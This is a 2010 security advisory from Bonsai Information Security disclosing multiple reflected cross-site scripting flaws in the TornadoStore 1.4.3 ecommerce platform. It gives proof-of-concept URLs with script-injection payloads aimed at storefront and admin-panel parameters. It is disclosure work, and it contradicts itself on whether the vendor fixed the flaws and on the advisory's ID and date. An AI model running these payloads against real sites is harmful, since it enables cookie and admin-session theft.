Bonsai Information Security - Vulnerability Research

Multiple XSS in TornadoStore 1.4.3



1. Advisory Information

Advisory ID: BONSAI-2010-0107
Date published: 2010-06-29
Vendors contacted: TornadoStore
Release mode: Coordinated release


2. Vulnerability Information

Class: Multiple Cross Site Scripting (XSS)
Remotely Exploitable: Yes
Locally Exploitable: YES
CVE Name: CVE-2010-1328


3. Software Description

TornadoStore™ is an ecommerce platform. The objective is to solve integrally the commercialization of products and services of companies using an online payment system. [0]


4. Vulnerability Description

Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites. Cross-site scripting (XSS) attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user in the output it generates without validating or encoding it.

For additional information please read [1].


5. Vulnerable packages

TornadoStore:
    - Version <= 1.4.3

6. Non-vulnerable packages

TornadoStore developers did not fix this vulnerability. More information to be found here:

[0].



7. Credits

These vulnerabilities were discovered by Lucas Apa ( lucas -at- bonsai-sec.com ).


8. Technical Description

8.1 A Reflected Cross Site Scripting vulnerability was found in the "tipo" and "destino" variables within the 'Services' section and "rubro", "arti" on 'Products' section.This is because the application does not properly sanitisethe users input.


The vulnerability can be triggered by clicking on the following URL:

http://www.example.com/login_registrese.php3?tipo=bonsai"/><script>alert(document.cookie)</script>&destino=ordenes_pago.php3

http://www.example.com/login_registrese.php3?destino=cliente_ctacte.php3"<script>alert(document.cookie)</script>

http://www.example.com/precios.php3?pbegin=0&subrubro=15&rubro=4"</a><script>alert(document.cookie)</script>"&expand=SI&familia=&marca=&campoorden=nArtPre&vertodos=ALL

http://www.example.com/recomenda_articulo.php3?arti=002"><script>alert(document.cookie)</script>

8.2 A Reflected Cross Site Scripting vulnerability was found in the TornadoStore Administration Panel. In "descrip" and "tit" variables within the 'e-Commerce' Section. This could lead to admin session hijacking.

http://www.example.com/control/abm_det.php3?db=ts_143&tabla=profile&id=cDefSec%3DMAIN%2CcDefKey%3DMAIL_PEDIDO_TEMPRANO%2CcSis%3Ddemo_143&tabla_det=&tit=Par%E1metros%20del%20sitio&pkmapped=&ira=&pagina=1&det_order=&det_ordor=&txtBuscar=&vars=display_text_chars=45,display_text_lines=1&where=cDefSec=%27MAIN%27&whereMaster=cDefSec=%27MAIN%27&descrip="<script>alert(document.cookie)</script><a href="

http://www.example.com/control/abm_list.php3?db=ts_143&tabla=delivery_courier&tabla_det=delivery_costo&order=&ordor=&tit=</span></td><script>alert(document.cookie)</script>&transporte=&ira=&pagina=1&det_order=nDeCSer&det_ordor=asc&txtBuscar=&vars=&where=

http://www.example.com/control/abm_det.php3?db=ts_143&tabla=usuario&tit=</span></td><script>alert(document.cookie)</script>


9. Report Timeline

  1. 2010-02-02:
  2. Vulnerabilities were identified.

  3. 2010-02-08:
  4. Vendor confirmed these vulnerabilities.

  5. 2010-02-16:
  6. Vendor contacted for an approximate fix release date. No specific answer given.

  7. 2010-03-10:
  8. Vendor contacted for an approximate fix release date. No specific answer given.

  9. 2010-04-12:
  10. Vendor fixed this issue.

  11. 2010-05-29:
  12. The advisory BONSAI-2010-0105 is published.


10. References

[0] http://www.tornadostore.com

[1] http://www.owasp.org/index.php/Cross_site_scripting

[2] http://www.bonsai-sec.com/research/


11. About Bonsai

Bonsai is a company involved in providing professional computer information security services. Currently a sound growth company, since its foundation in early 2009 in Buenos Aires, Argentina, we are fully committed to quality service, and focused on our customers real needs.


12. Disclaimer

The contents of this advisory are copyright (c) 2010 Bonsai Information Security, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given.